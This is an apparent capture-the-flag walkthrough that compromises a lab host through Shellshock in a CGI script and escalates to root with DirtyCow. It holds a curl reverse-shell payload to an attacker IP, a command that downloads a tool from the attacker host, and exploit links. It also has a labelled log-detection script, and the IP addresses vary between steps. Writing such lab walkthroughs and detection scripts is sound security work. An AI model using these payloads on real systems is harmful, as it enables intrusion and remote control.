Summary

This machine is exploited through the ShellShock vulnerability. Privileges are then escalated via the DirtyCow local root exploit.

Enumeration
Two ports are open, so we hit the web port with Nikto:

kali@kali:~/sumo$ nikto -h http://192.168.54.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.87
+ Target Hostname: 192.168.54.87
+ Target Port: 80
+ Start Time: 2021-09-20 15:23:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/sumo$
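Added here as a defender-side example, not part of the original write-up: the Shellshock probes Nikto reports above, and the curl requests used later in this post, land in Apache's access log with a bash function definition ("() {") inside a request header. This Python script assumes the Apache combined log format and runs over constructed sample lines to flag such requests.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock trigger: a header value beginning with a bash function definition
# "() {". Apache exports the header into the CGI environment and a vulnerable
# bash runs whatever follows the function body (CVE-2014-6271 and the later
# variants Nikto reports). Whitespace between the tokens is optional.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

@dataclass
class Hit:
    host: str
    time: str
    path: str
    field: str   # header that carried the payload: "agent" or "referer"
    value: str

def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def find_shellshock(lines: List[str]) -> List[Hit]:
    """One Hit per line whose User-Agent or Referer carries the pattern (any path)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:          # unparseable line: skip rather than crash
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) >= 2 else rec["request"]
        for field in ("agent", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["host"], rec["time"], path, field, rec[field]))
                break
    return hits

# Constructed sample lines (not from the original post): benign request, probe in User-Agent, probe in Referer, unparseable line.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Sep/2021:15:23:00 -0400] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Sep/2021:15:25:12 -0400] "GET /cgi-bin/test/test.cgi HTTP/1.1" 200 52 "-" "() { :; }; echo probe"',
    '10.0.0.9 - - [20/Sep/2021:15:25:40 -0400] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "(){ :; }; echo probe" "curl/7.74.0"',
    'garbage line that does not parse',
]
```

Run find_shellshock over your own access log lines; the two probe lines above are reported and the benign and malformed lines are not.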
Keeping things simple, let’s just see if this is really vulnerable:
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi
Excellent! We execute id and get a response. Now let’s see if we can get a shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi
With our handler set up:
Excellent! We catch our shell and we clean up the environment. Now let’s see what we’re dealing with:
gcc gives an error. We can fix that by adding the standard binary directories and the gcc directory to our PATH:
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/; export PATH
Let’s also try linux-exploit-suggester:
https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh
wget http://192.168.49.54/linux-exploit-suggester.sh
--2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh
Connecting to 192.168.49.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'

 0K .......... .......... .......... .......... .......... 57% 227K 0s
50K .......... .......... .......... ...... 100% 2.58M=0.2s

2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891]

www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent
   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
   Download URL: https://www.exploit-db.com/download/26131
   Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2
   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
   Download URL: https://cyseclabs.com/exploits/vnik_v1.c
   Comments: No SMEP/SMAP bypass

--snip--

[+] [CVE-2012-0809] death_star (sudo)
   Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
   Exposure: less probable
   Tags: fedora=16
   Download URL: https://www.exploit-db.com/download/18436

www-data@ubuntu:/tmp$
And yes, we use DirtyCow:
https://github.com/FireFart/dirtycow/blob/master/dirty.c